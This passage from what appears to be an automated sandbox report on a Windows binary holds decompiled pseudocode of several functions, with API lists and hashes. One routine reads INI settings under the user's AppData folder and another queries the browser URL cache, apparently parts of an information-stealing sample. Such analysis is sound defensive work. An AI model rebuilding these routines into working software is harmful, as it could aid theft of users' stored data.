Instruction ID: b106f82ce96953bf229530fcbc2442ad0e6866fae64c6ee75da8daf3995b36d5
Opcode Fuzzy Hash: dbf2c3aeb27526b962e5394d52e690c3c669cebb66b287d3d29cb1e44e7614d4
Instruction Fuzzy Hash: 1B91D0713043229FC720DF25E980A6BB3E9AFC8704F50442EF94597355EB78ED468BA6

Uniqueness

Uniqueness Score: -1.00%

Function 00418D30, Relevance: 9.2, APIs: 6, Instructions: 239
memoryCOMMON

Download Yara Rule

C-Code - Quality: 99%

			E00418D30(void** _a4, signed char _a8, intOrPtr _a12) {
				char _v260;
				long _v264;
				void* __esi;
				void* _t73;
				long _t75;
				void* _t78;
				long _t84;
				void* _t89;
				long _t96;
				void* _t98;
				intOrPtr* _t100;
				long _t104;
				void* _t107;
				signed int _t108;
				signed int _t109;
				void* _t114;
				signed int _t115;
				signed int _t116;
				void* _t118;
				intOrPtr _t120;
				intOrPtr _t126;
				intOrPtr _t129;
				long* _t130;
				intOrPtr _t134;
				intOrPtr _t140;
				void* _t144;
				signed int _t145;
				intOrPtr* _t146;
				void* _t147;
				long* _t151;
				intOrPtr _t153;
				void* _t154;

				_t118 =  *_a4;
				_v264 = 0;
				if((_a8 & 0x00000001) != 0) {
					while(1) {
						L2:
						_t104 = _v264;
						if(_t104 != 0) {
							goto L6;
						}
						L3:
						if( *((intOrPtr*)(_t118 + 0x1c)) != _t104 &&  *((intOrPtr*)(_t118 + 0x14)) >= 0x40) {
							_t151 = _t118 + 0x30;
							L7:
							_t129 =  *((intOrPtr*)(_t118 + 0x14));
							_t107 = _t151 - _t118 + 0x10;
							if(_t107 <= _t129 && _t151[2] + _t107 <= _t129) {
								L9:
								_v264 = _t151;
								if( *_t151 <= 0) {
									L2:
									_t104 = _v264;
									if(_t104 != 0) {
										goto L6;
									}
									goto L27;
								} else {
									L10:
									_t108 = _t151[1];
									if((_t108 & 0x000c0000) == 0) {
										_t109 = _t108 & 0xfff0ffff;
										_t151[1] = _t109;
										_t145 = _t109 & 0x70000000;
										_t130 = _t151;
										L13:
										while(1) {
											do {
												do {
													if(_t130 != 0) {
														_t130 =  &(_t130[4]) + _t130[2];
														goto L18;
													} else {
														if( *((intOrPtr*)(_t118 + 0x1c)) == _t130 ||  *((intOrPtr*)(_t118 + 0x14)) < 0x40) {
															while(1) {
																L2:
																_t104 = _v264;
																if(_t104 != 0) {
																	goto L6;
																}
																goto L3;
															}
														} else {
															_t130 = _t118 + 0x30;
															L18:
															_t140 =  *((intOrPtr*)(_t118 + 0x14));
															_t114 = _t130 - _t118 + 0x10;
															if(_t114 > _t140 || _t130[2] + _t114 > _t140) {
																while(1) {
																	L2:
																	_t104 = _v264;
																	if(_t104 != 0) {
																		goto L6;
																	}
																	goto L3;
																}
															} else {
																goto L20;
															}
														}
													}
													goto L59;
													L20:
												} while ( *_t130 !=  *_t151);
												_t115 = _t130[1];
											} while ((_t115 & 0x70000000) != _t145);
											if((_t115 & 0x000e0000) != 0) {
												 *_t151 = 0;
												_t116 = _t130[1];
												if((_t116 & 0x00080000) == 0) {
													_t130[1] = _t116 & 0xfff0ffff;
												} else {
													 *_t130 = 0;
												}
												do {
													goto L2;
												} while ( *_t151 <= 0);
												goto L10;
											} else {
												 *_t130 = 0;
												continue;
											}
											goto L59;
										}
									} else {
										 *_t151 = 0;
										while(1) {
											L2:
											_t104 = _v264;
											if(_t104 != 0) {
												goto L6;
											}
											goto L3;
										}
									}
								}
								L59:
							}
						}
						goto L27;
						L6:
						_t151 =  *((intOrPtr*)(_t104 + 8)) + _t104 + 0x10;
						goto L7;
					}
				}
				L27:
				_t73 = HeapAlloc( *0x42e6d4, 8, 0x34);
				if(_t73 != 0) {
					 *((intOrPtr*)(_t73 + 0x14)) = 0x30;
				}
				_t144 = _t73;
				if(_t73 == 0) {
					L58:
					return 0;
				} else {
					_t75 = 0;
					L32:
					while(1) {
						if(_t75 != 0) {
							_t146 =  *((intOrPtr*)(_t75 + 8)) + _t75 + 0x10;
							goto L37;
						} else {
							if( *((intOrPtr*)(_t118 + 0x1c)) == _t75 ||  *((intOrPtr*)(_t118 + 0x14)) < 0x40) {
								L47:
								_push( *((intOrPtr*)(_t144 + 0x14)) - 0x30);
								_t60 = _t144 + 0x30; // 0x30
								_t61 = _t144 + 0x20; // 0x20
								if(E00412470() == 0) {
									goto L57;
								} else {
									_t147 = 0;
									do {
										_t84 = GetTickCount();
										if(_t84 !=  *0x42dd08) {
											 *0x42dd08 = _t84;
											E00412320(_t84);
										}
										 *((char*)(_t147 + _t144)) = E00412360() - (_t85 & 0xffffff00);
										_t147 = _t147 + 1;
									} while (_t147 < 0x14);
									_t148 = _a12;
									_t153 =  *((intOrPtr*)(_t144 + 0x14));
									if(_a12 != 0) {
										_t89 = 1;
										if(_t153 > 1) {
											do {
												 *(_t89 + _t144) =  *(_t89 + _t144) ^  *(_t89 + _t144 - 1);
												_t89 = _t89 + 1;
											} while (_t89 < _t153);
										}
										E00412640(E00410820( &_v260, _t148, 0x102), _t144, _t153);
									}
									HeapFree( *0x42e6d4, 0, _t118);
									 *_a4 = _t144;
									return _t153;
								}
							} else {
								_t146 = _t118 + 0x30;
								L37:
								_t120 =  *((intOrPtr*)(_t118 + 0x14));
								_t78 = _t146 - _t118 + 0x10;
								if(_t78 > _t120) {
									goto L47;
								} else {
									_t134 =  *((intOrPtr*)(_t146 + 8));
									if(_t78 + _t134 > _t120) {
										goto L47;
									} else {
										_v264 = _t146;
										if( *_t146 <= 0) {
											L31:
											_t75 = _v264;
											continue;
										} else {
											_t154 = _t134 + 0x10;
											_t96 =  *((intOrPtr*)(_t144 + 0x14)) + _t154;
											if(_t96 != 0) {
												_t98 = HeapReAlloc( *0x42e6d4, 8, _t144, _t96 + 4);
												if(_t98 == 0) {
													L57:
													HeapFree( *0x42e6d4, 0, _t144);
													goto L58;
												} else {
													_t144 = _t98;
													goto L44;
												}
											} else {
												HeapFree( *0x42e6d4, _t96, _t144);
												_t144 = 0;
												L44:
												_t100 =  *((intOrPtr*)(_t144 + 0x14)) + _t144;
												 *_t100 =  *_t146;
												 *((intOrPtr*)(_t100 + 4)) =  *((intOrPtr*)(_t146 + 4));
												_t126 =  *((intOrPtr*)(_t146 + 8));
												 *((intOrPtr*)(_t100 + 8)) = _t126;
												 *((intOrPtr*)(_t100 + 0xc)) =  *((intOrPtr*)(_t146 + 0xc));
												if(_t126 != 0) {
													E00410820(_t100 + 0x10, _t146 + 0x10, _t126);
												}
												 *((intOrPtr*)(_t144 + 0x1c)) =  *((intOrPtr*)(_t144 + 0x1c)) + 1;
												 *((intOrPtr*)(_t144 + 0x14)) =  *((intOrPtr*)(_t144 + 0x14)) + _t154;
												goto L31;
											}
										}
									}
								}
							}
						}
						goto L59;
					}
				}
				goto L59;
			}

0x00418d46
0x00418d4b
0x00418d53
0x00418d60
0x00418d60
0x00418d60
0x00418d66
0x00000000
0x00000000
0x00418d68
0x00418d6b
0x00418d7b
0x00418d87
0x00418d87
0x00418d8e
0x00418d93
0x00418da6
0x00418da9
0x00418dad
0x00418d60
0x00418d60
0x00418d66
0x00000000
0x00000000
0x00000000
0x00418daf
0x00418daf
0x00418daf
0x00418db7
0x00418dc1
0x00418dc6
0x00418dce
0x00418dd0
0x00000000
0x00418dd2
0x00418dd2
0x00418dd2
0x00418dd4
0x00418ded
0x00000000
0x00418dd6
0x00418dd9
0x00418d60
0x00418d60
0x00418d60
0x00418d66
0x00000000
0x00000000
0x00000000
0x00418d66
0x00418de5
0x00418de5
0x00418df1
0x00418df1
0x00418df8
0x00418dfd
0x00418d60
0x00418d60
0x00418d60
0x00418d66
0x00000000
0x00000000
0x00000000
0x00418d66
0x00000000
0x00000000
0x00000000
0x00418dfd
0x00418dd9
0x00000000
0x00418e10
0x00418e12
0x00418e16
0x00418e21
0x00418e2a
0x00418e34
0x00418e3a
0x00418e42
0x00418e54
0x00418e44
0x00418e44
0x00418e44
0x00418d60
0x00000000
0x00000000
0x00000000
0x00418e2c
0x00418e2c
0x00000000
0x00418e2c
0x00000000
0x00418e2a
0x00418db9
0x00418db9
0x00418d60
0x00418d60
0x00418d60
0x00418d66
0x00000000
0x00000000
0x00000000
0x00418d66
0x00418d60
0x00418db7
0x00000000
0x00418dad
0x00418d93
0x00000000
0x00418d80
0x00418d83
0x00000000
0x00418d83
0x00418d60
0x00418e5c
0x00418e66
0x00418e6e
0x00418e70
0x00418e70
0x00418e77
0x00418e7b
0x00419012
0x0041901b
0x00418e81
0x00418e81
0x00000000
0x00418e90
0x00418e92
0x00418eaf
0x00000000
0x00418e94
0x00418e97
0x00418f4a
0x00418f50
0x00418f51
0x00418f55
0x00418f60
0x00000000
0x00418f66
0x00418f6c
0x00418f70
0x00418f70
0x00418f78
0x00418f7a
0x00418f7f
0x00418f7f
0x00418f93
0x00418f96
0x00418f97
0x00418f9c
0x00418fa3
0x00418fa8
0x00418faa
0x00418fb1
0x00418fb3
0x00418fb7
0x00418fba
0x00418fbb
0x00418fb3
0x00418fd3
0x00418fd3
0x00418fe2
0x00418fef
0x00418ffd
0x00418ffd
0x00418ea7
0x00418ea7
0x00418eb3
0x00418eb3
0x00418eba
0x00418ebf
0x00000000
0x00418ec5
0x00418ec5
0x00418ecc
0x00000000
0x00418ece
0x00418ed1
0x00418ed5
0x00418e85
0x00418e85
0x00000000
0x00418ed7
0x00418eda
0x00418edd
0x00418edf
0x00418f02
0x00418f0a
0x00419000
0x00419009
0x00000000
0x00418f10
0x00418f10
0x00000000
0x00418f10
0x00418ee1
0x00418eea
0x00418ef0
0x00418f12
0x00418f17
0x00418f19
0x00418f1e
0x00418f21
0x00418f24
0x00418f2a
0x00418f2f
0x00418f3a
0x00418f3a
0x00418f3f
0x00418f42
0x00000000
0x00418f42
0x00418edf
0x00418ed5
0x00418ecc
0x00418ebf
0x00418e97
0x00000000
0x00418e92
0x00418e90
0x00000000

APIs

HeapAlloc.KERNEL32(?,00000008,00000034,?,?,?,?), ref: 00418E66
HeapFree.KERNEL32(?,?,00000000), ref: 00418EEA
HeapReAlloc.KERNEL32(?,00000008,00000000,?), ref: 00418F02
GetTickCount.KERNEL32 ref: 00418F70
HeapFree.KERNEL32(?,00000000,?), ref: 00418FE2

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocFree$CountTick
String ID:
API String ID: 3424527383-0
Opcode ID: 3451fddb23d1aabb315a81a0871efe6bf8ba384b1e91c66c1e08d66cc59b5b79
Instruction ID: d3d9caf029e3aba5c6aa2189252adf4bcf81e4ace62a6341c11dea86db7e6582
Opcode Fuzzy Hash: 3451fddb23d1aabb315a81a0871efe6bf8ba384b1e91c66c1e08d66cc59b5b79
Instruction Fuzzy Hash: 6581A0712003068BCB28DF25D980BA777A5FF94304F14896EE845CB391DB79E896CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040B6F0, Relevance: 9.2, APIs: 6, Instructions: 175
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B6F0(intOrPtr* __eax) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t57;
				intOrPtr* _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr* _t61;
				intOrPtr _t62;
				void* _t67;
				signed int _t68;
				short* _t86;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				struct _GOPHER_FIND_DATAA _t93;
				intOrPtr _t94;
				intOrPtr* _t102;
				intOrPtr _t105;
				intOrPtr* _t110;
				char* _t112;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr* _t123;
				void* _t125;
				void* _t126;

				_t89 = _t88 | 0xffffffff;
				_t110 = __eax;
				 *(_t126 + 0x10) = _t89;
				EnterCriticalSection(0x42d3ec);
				_t94 =  *_t110;
				if(_t94 == 0) {
					L41:
					LeaveCriticalSection(0x42d3ec);
					return  *((intOrPtr*)(_t126 + 0xc));
				}
				_t115 =  *0x42d408; // 0x0
				_t56 = 0;
				if(_t115 == 0) {
					L40:
					goto L41;
				} else {
					_t123 =  *0x42d404; // 0x0
					_t102 = _t123;
					while( *_t102 != _t94) {
						_t56 = _t56 + 1;
						_t102 = _t102 + 0x24;
						if(_t56 < _t115) {
							continue;
						} else {
							L39:
							goto L40;
						}
					}
					if(_t56 == _t89) {
						goto L39;
					}
					_t57 = _t56 + _t56 * 8;
					_t125 = _t123 + _t57 * 4;
					if( *((intOrPtr*)(_t123 + 0x10 + _t57 * 4)) <= 0) {
						goto L39;
					}
					if( *((intOrPtr*)(_t125 + 0x10)) != 1 || ( *( *(_t125 + 0xc)) & 0x00000003) == 0) {
						_t58 =  *((intOrPtr*)(_t126 + 0x34));
						if(_t58 != 0) {
							 *_t58 = 0;
						}
						if( *((intOrPtr*)(_t125 + 0x18)) != _t89) {
							L28:
							_t59 =  *((intOrPtr*)(_t125 + 0x18));
							if(_t59 != 0xffffffff &&  *((intOrPtr*)(_t126 + 0x14)) == 0xffffffff) {
								_t60 = _t59 -  *((intOrPtr*)(_t125 + 0x1c));
								_t117 = _t60;
								if(_t60 != 0) {
									_t90 =  *((intOrPtr*)(_t126 + 0x2c));
									if(_t90 != 0) {
										_t62 =  *((intOrPtr*)(_t126 + 0x30));
									} else {
										_t62 = E00412520(0x2000, 0x1000);
									}
									_t117 =  <  ? _t62 : _t117;
									if(_t90 != 0) {
										E00410820(_t90,  *(_t125 + 0x14) +  *((intOrPtr*)(_t125 + 0x1c)), _t117);
										 *((intOrPtr*)(_t125 + 0x1c)) =  *((intOrPtr*)(_t125 + 0x1c)) + _t117;
									}
								}
								_t61 =  *((intOrPtr*)(_t126 + 0x34));
								if(_t61 != 0) {
									 *_t61 = _t117;
								}
								 *((intOrPtr*)(_t126 + 0x14)) = 1;
							}
							goto L39;
						} else {
							LeaveCriticalSection(0x42d3ec);
							_t67 = E0040B560(_t126 + 0x20, _t126 + 0x18,  *_t110,  *((intOrPtr*)(_t125 + 4)));
							EnterCriticalSection(0x42d3ec);
							if(_t67 == 0) {
								L27:
								 *((intOrPtr*)(_t126 + 0x18)) = 0;
								SetLastError(0x2ee4);
								goto L28;
							}
							_t92 =  *_t110;
							_t68 = E0040A9C0( *_t110);
							if(_t68 == 0xffffffff) {
								E004107C0( *(_t126 + 0x10));
								goto L27;
							}
							_t105 =  *0x42d404; // 0x0
							_t125 = _t105 + (_t68 + _t68 * 8) * 4;
							_t121 = E004136E0(_t92, _t126 + 0x1c);
							if(E00425560(_t71, _t126 + 0x1c, _t126 + 0x20,  *(_t125 + 0xc),  *((intOrPtr*)(_t125 + 0x10))) != 0) {
								_t112 = E00410AA0(_t121, 0,  *((intOrPtr*)(_t126 + 0x1c)));
								 *(_t126 + 0x24) = _t112;
								if(_t112 != 0) {
									 *(_t126 + 0x20) = 0x1000;
									_t93 = E004107A0(0x1000);
									if(_t93 != 0) {
										 *_t93 = 0x50;
										if(GetUrlCacheEntryInfoW(_t112, _t93, _t126 + 0x20) != 0) {
											_t86 =  *((intOrPtr*)(_t93 + 8));
											if(_t86 != 0 &&  *_t86 != 0) {
												E00417FC0(_t86,  *(_t126 + 0x10),  *((intOrPtr*)(_t126 + 0x18)));
												_t112 =  *(_t126 + 0x24);
											}
										}
										E004107C0(_t93);
									}
									E004107C0(_t112);
								}
							}
							E004107C0(_t121);
							 *(_t125 + 0x14) =  *(_t126 + 0x10);
							 *((intOrPtr*)(_t125 + 0x18)) =  *((intOrPtr*)(_t126 + 0x18));
							goto L28;
						}
					} else {
						 *_t110 =  *((intOrPtr*)(_t125 + 0x20));
						goto L39;
					}
				}
			}

0x0040b6f5
0x0040b6fd
0x0040b6ff
0x0040b703
0x0040b709
0x0040b70d
0x0040b908
0x0040b90d
0x0040b91c
0x0040b91c
0x0040b714
0x0040b71a
0x0040b71e
0x0040b907
0x00000000
0x0040b724
0x0040b725
0x0040b72b
0x0040b730
0x0040b734
0x0040b735
0x0040b73a
0x00000000
0x0040b73c
0x0040b906
0x00000000
0x0040b906
0x0040b73a
0x0040b743
0x00000000
0x00000000
0x0040b749
0x0040b751
0x0040b755
0x00000000
0x00000000
0x0040b75f
0x0040b773
0x0040b779
0x0040b77b
0x0040b77b
0x0040b784
0x0040b8a7
0x0040b8a7
0x0040b8ad
0x0040b8b6
0x0040b8b9
0x0040b8bb
0x0040b8bd
0x0040b8c3
0x0040b8d6
0x0040b8c5
0x0040b8cf
0x0040b8cf
0x0040b8dc
0x0040b8e1
0x0040b8ec
0x0040b8f1
0x0040b8f1
0x0040b8e1
0x0040b8f4
0x0040b8fa
0x0040b8fc
0x0040b8fc
0x0040b8fe
0x0040b8fe
0x00000000
0x0040b78a
0x0040b792
0x0040b7a4
0x0040b7b0
0x0040b7b8
0x0040b894
0x0040b899
0x0040b8a1
0x00000000
0x0040b8a1
0x0040b7be
0x0040b7c2
0x0040b7ca
0x0040b88f
0x00000000
0x0040b88f
0x0040b7d0
0x0040b7dd
0x0040b7e8
0x0040b801
0x0040b80f
0x0040b811
0x0040b817
0x0040b81e
0x0040b827
0x0040b82b
0x0040b834
0x0040b842
0x0040b844
0x0040b849
0x0040b85d
0x0040b862
0x0040b862
0x0040b849
0x0040b868
0x0040b868
0x0040b86f
0x0040b86f
0x0040b817
0x0040b876
0x0040b883
0x0040b886
0x00000000
0x0040b886
0x0040b769
0x0040b76c
0x00000000
0x0040b76c
0x0040b75f

APIs

EnterCriticalSection.KERNEL32(0042D3EC), ref: 0040B703
LeaveCriticalSection.KERNEL32(0042D3EC), ref: 0040B792
EnterCriticalSection.KERNEL32(0042D3EC), ref: 0040B7B0
GetUrlCacheEntryInfoW.WININET(00000000,00000000,?), ref: 0040B83A

Part of subcall function 004107C0: HeapFree.KERNEL32(?,00000000,00000000,004078C3,00000000), ref: 004107CD

SetLastError.KERNEL32 ref: 0040B8A1
LeaveCriticalSection.KERNEL32(0042D3EC), ref: 0040B90D

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave$CacheEntryErrorFreeHeapInfoLast
String ID:
API String ID: 1663815765-0
Opcode ID: 3809e2232a6971a91debed89d44fdee282fdac2b39fe0b3df2e66cd5e8ed963c
Instruction ID: 8d6b302f2cf739b2c0219e374bd85d2cd37e0efa3a55e7f05df0cb438fbd279c
Opcode Fuzzy Hash: 3809e2232a6971a91debed89d44fdee282fdac2b39fe0b3df2e66cd5e8ed963c
Instruction Fuzzy Hash: 99518C716003069BCB10EF25C880AAB73A8EF84754F14462EF855A73E1D778ED45CBDA

Uniqueness

Uniqueness Score: -1.00%

Function 00423DA0, Relevance: 9.2, APIs: 6, Instructions: 169
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00423DA0(void* _a4) {
				char _v337;
				char _v804;
				intOrPtr _v812;
				long _v816;
				void* _v836;
				intOrPtr _v840;
				void* _v844;
				intOrPtr _v848;
				char _v852;
				long _v856;
				void* _v864;
				char _v865;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				void* _t61;
				void* _t64;
				void* _t71;
				char _t76;
				void* _t79;
				void* _t83;
				void* _t96;
				void* _t97;
				void* _t101;
				void* _t103;
				void* _t105;

				_t101 = _a4;
				_v865 = 0;
				if(_t101 == 0) {
					_t101 =  &_v337;
				}
				E0041D150( &_v804);
				E00410870( &_v852,  &_v852, 0, 0x30);
				_t48 =  *0x42eb6c;
				if(_t48 == 0) {
					_t48 = E00413580();
					 *0x42eb6c = _t48;
				}
				_v840 = _t48;
				_v852 = 0x501;
				_v848 = 0x1388;
				_v816 = 0;
				_v844 =  *0x42edbc;
				_v836 = _t101;
				_v812 = 0x12d000;
				if(E004133B0( &_v852,  &_v864) == 0) {
					_t76 = _v865;
					goto L12;
				} else {
					if(E00423CB0( &_v804,  &_v864, 0 | _a4 != 0x00000000) != 0) {
						_v865 = 1;
					}
					_t71 = _v864;
					if(_t71 != 0) {
						HeapFree( *0x42e6d4, 0, _t71);
					}
					_t76 = _v865;
					if(_t76 == 0) {
						L12:
						if(_a4 != 0) {
							goto L10;
						} else {
							_t103 = E00423A90();
							if(_t103 == 0) {
								goto L10;
							} else {
								_v856 = 0;
								_t96 = E00418BD0(0x4e24, 0x10000000, _t103);
								if(_t96 == 0) {
									_t79 = _v856;
									goto L18;
								} else {
									_t79 = E00418C20(_t96);
									if(_t79 == 0) {
										L18:
										_t97 = _v856;
									} else {
										_t97 =  *(_t96 + 0xc);
									}
								}
								HeapFree( *0x42e6d4, 0, _t103);
								if(_t79 != 0) {
									if(_t97 >= 2 &&  *((char*)(_t79 + _t97 - 1)) == 0 &&  *((char*)(_t79 + _t97 - 2)) == 0) {
										_t105 = _t79;
										if(WaitForSingleObject( *0x42edbc, 0x2710) == 0x102) {
											while(1) {
												L24:
												_v836 = _t105;
												if(E004133B0( &_v852,  &_v864) != 0) {
													if(E00423CB0( &_v804,  &_v864, 0) != 0) {
														_v865 = 1;
													}
													_t64 = _v864;
													if(_t64 != 0) {
														HeapFree( *0x42e6d4, 0, _t64);
													}
												}
												if(_v865 != 0) {
													goto L36;
												}
												_t83 = 0;
												_t61 = _t105 + 1;
												L31:
												while(1) {
													if( *((char*)(_t61 - 1)) != 0) {
														L34:
														_t61 = _t61 + 1;
														continue;
													}
													if( *_t61 != 0) {
														_t83 = _t83 + 1;
														if(_t83 == 1) {
															_t105 = _t61;
															if(WaitForSingleObject( *0x42edbc, 0x2710) == 0x102) {
																goto L24;
															}
														} else {
															goto L34;
														}
													}
													goto L36;
												}
											}
										}
									}
									L36:
									HeapFree( *0x42e6d4, 0, _t79);
								}
								return _v865;
							}
						}
					} else {
						L10:
						return _t76;
					}
				}
			}

0x00423dae
0x00423db4
0x00423dbb
0x00423dbd
0x00423dbd
0x00423dc8
0x00423dd5
0x00423dda
0x00423de1
0x00423de3
0x00423de8
0x00423de8
0x00423df7
0x00423e02
0x00423e09
0x00423e11
0x00423e15
0x00423e19
0x00423e1d
0x00423e2c
0x00423e77
0x00000000
0x00423e2e
0x00423e48
0x00423e4a
0x00423e4a
0x00423e4e
0x00423e54
0x00423e5e
0x00423e5e
0x00423e64
0x00423e6a
0x00423e7b
0x00423e7e
0x00000000
0x00423e80
0x00423e85
0x00423e89
0x00000000
0x00423e8b
0x00423e8b
0x00423e9e
0x00423ea2
0x00423eb4
0x00000000
0x00423ea4
0x00423ea9
0x00423ead
0x00423eb8
0x00423eb8
0x00423eaf
0x00423eaf
0x00423eaf
0x00423ead
0x00423ec6
0x00423ece
0x00423ed7
0x00423f05
0x00423f0e
0x00423f10
0x00423f10
0x00423f19
0x00423f24
0x00423f39
0x00423f3b
0x00423f3b
0x00423f40
0x00423f46
0x00423f51
0x00423f51
0x00423f46
0x00423f5c
0x00000000
0x00000000
0x00423f5e
0x00423f60
0x00000000
0x00423f63
0x00423f67
0x00423f74
0x00423f74
0x00000000
0x00423f74
0x00423f6c
0x00423f6e
0x00423f72
0x00423f83
0x00423f8c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00423f72
0x00000000
0x00423f6c
0x00423f63
0x00423f10
0x00423f0e
0x00423f8e
0x00423f98
0x00423f98
0x00423fa8
0x00423fa8
0x00423e89
0x00423e6c
0x00423e6c
0x00423e74
0x00423e74
0x00423e6a

APIs

HeapFree.KERNEL32(?,00000000,?,?,?,00000000), ref: 00423E5E
HeapFree.KERNEL32(?,00000000,00000000), ref: 00423EC6
WaitForSingleObject.KERNEL32(?,00002710), ref: 00423F07
HeapFree.KERNEL32(?,00000000,?,?,?,00000000,?), ref: 00423F51
WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00423F85
HeapFree.KERNEL32(?,00000000,?), ref: 00423F98

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap$ObjectSingleWait
String ID:
API String ID: 3267977683-0
Opcode ID: 9098a6b1febd1c8eb943cb92da3de6c9209545c691cb58d17b0afa98e8dc7885
Instruction ID: c0138160413d9f3245f443c2b03654b03d0d3b66ba5332b5eee5ef0cc6cca522
Opcode Fuzzy Hash: 9098a6b1febd1c8eb943cb92da3de6c9209545c691cb58d17b0afa98e8dc7885
Instruction Fuzzy Hash: 7F5103717083115AC320DF66E940B9BB7F5AB94705F84096FF98097350D63CDE49CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00407570, Relevance: 9.1, APIs: 6, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00407570(void* __eflags) {
				intOrPtr _v32;
				char _v556;
				short _v1068;
				short _v1076;
				char _v1560;
				short _v1580;
				short _v1588;
				char _v1596;
				char _v2112;
				short _v2116;
				char _v2168;
				short _v2200;
				char _v2220;
				short _v2240;
				short _v2252;
				void* __esi;
				char* _t27;
				signed int _t28;
				long _t29;
				signed int _t31;
				short* _t39;
				signed char _t42;
				WCHAR* _t45;
				WCHAR* _t48;
				WCHAR* _t70;
				WCHAR* _t71;
				WCHAR* _t75;
				long _t76;
				void* _t80;

				_t70 =  &_v2112;
				E00424100(0x2a, _t70);
				_t27 =  &_v1560;
				__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t27);
				if(_t27 == 0) {
					_t45 = _t70;
					while(1) {
						_t28 =  *_t45 & 0x0000ffff;
						if(_t28 != 0x5c && _t28 != 0x2f) {
							break;
						}
						_t45 =  &(_t45[1]);
					}
					_t29 = PathCombineW( &_v1580,  &_v1580, _t45);
					__eflags = _t29;
					if(_t29 == 0) {
						L27:
						return _t29;
					}
					_t71 =  &_v2168;
					E00424100(0x2c, _t71);
					_t48 = _t71;
					while(1) {
						_t31 =  *_t48 & 0x0000ffff;
						__eflags = _t31 - 0x5c;
						if(_t31 == 0x5c) {
							goto L9;
						}
						__eflags = _t31 - 0x2f;
						if(_t31 != 0x2f) {
							_t29 = PathCombineW( &_v1068,  &_v1588, _t48);
							__eflags = _t29;
							if(_t29 == 0) {
								goto L27;
							}
							_t29 = GetFileAttributesW( &_v1076);
							__eflags = _t29 - 0xffffffff;
							if(_t29 == 0xffffffff) {
								goto L27;
							}
							E00424100(0x2d,  &_v2220);
							E00424100(0x2e,  &_v2200);
							E00424100(0x2f,  &_v2252);
							_t42 = 0;
							__eflags = 0;
							while(1) {
								_push(_t42 & 0x000000ff);
								_t75 =  &_v2240;
								_t29 = E00411D10(_t42 & 0x000000ff, 0xa, _t75,  &_v2220);
								_t80 = _t80 + 8;
								__eflags = _t29 - 1;
								if(_t29 < 1) {
									break;
								}
								_t29 = GetPrivateProfileIntW(_t75,  &_v2200, 0xffffffff,  &_v1076);
								_t76 = _t29;
								__eflags = _t76 - 0xffffffff;
								if(_t76 == 0xffffffff) {
									break;
								}
								_t29 = GetPrivateProfileStringW( &_v2240,  &_v2252, 0,  &_v2116, 0x104,  &_v1076);
								__eflags = _t29;
								if(_t29 == 0) {
									L25:
									_t42 = _t42 + 1;
									__eflags = _t42 - 0xfa;
									if(_t42 < 0xfa) {
										continue;
									}
									break;
								}
								__eflags = _v2116;
								_t39 =  &_v2116;
								if(_v2116 == 0) {
									L21:
									_t56 =  &_v2116;
									__eflags = _t76 - 1;
									if(__eflags != 0) {
										L24:
										_t29 = E00407750(_t56, _v32, __eflags);
										__eflags = _t29;
										if(_t29 == 0) {
											break;
										}
										goto L25;
									}
									_t29 = E004188B0( &_v2116,  &_v556,  &_v1596);
									__eflags = _t29;
									if(__eflags == 0) {
										goto L25;
									}
									_t56 =  &_v556;
									goto L24;
								}
								do {
									__eflags =  *_t39 - 0x2f;
									if( *_t39 == 0x2f) {
										 *_t39 = 0x5c;
									}
									_t39 = _t39 + 2;
									__eflags =  *_t39;
								} while ( *_t39 != 0);
								goto L21;
							}
							goto L27;
						}
						L9:
						_t48 =  &(_t48[1]);
					}
				}
				return _t27;
			}

0x00407577
0x00407580
0x00407585
0x00407595
0x0040759d
0x004075a3
0x004075a5
0x004075a5
0x004075ab
0x00000000
0x00000000
0x004075b2
0x004075b2
0x004075ca
0x004075cc
0x004075ce
0x00407740
0x00000000
0x00407740
0x004075d4
0x004075dd
0x004075e2
0x004075e4
0x004075e4
0x004075e7
0x004075ea
0x00000000
0x00000000
0x004075ec
0x004075ef
0x00407607
0x00407609
0x0040760b
0x00000000
0x00000000
0x00407619
0x0040761f
0x00407622
0x00000000
0x00000000
0x00407633
0x00407641
0x0040764f
0x00407660
0x00407660
0x00407662
0x00407665
0x00407670
0x00407674
0x00407679
0x0040767c
0x0040767f
0x00000000
0x00000000
0x00407697
0x00407699
0x0040769b
0x0040769e
0x00000000
0x00000000
0x004076c5
0x004076c7
0x004076c9
0x00407733
0x00407733
0x00407735
0x00407738
0x00000000
0x00000000
0x00000000
0x00407738
0x004076cb
0x004076d4
0x004076db
0x004076f7
0x004076f7
0x004076fe
0x00407701
0x00407723
0x0040772a
0x0040772f
0x00407731
0x00000000
0x00000000
0x00000000
0x00407731
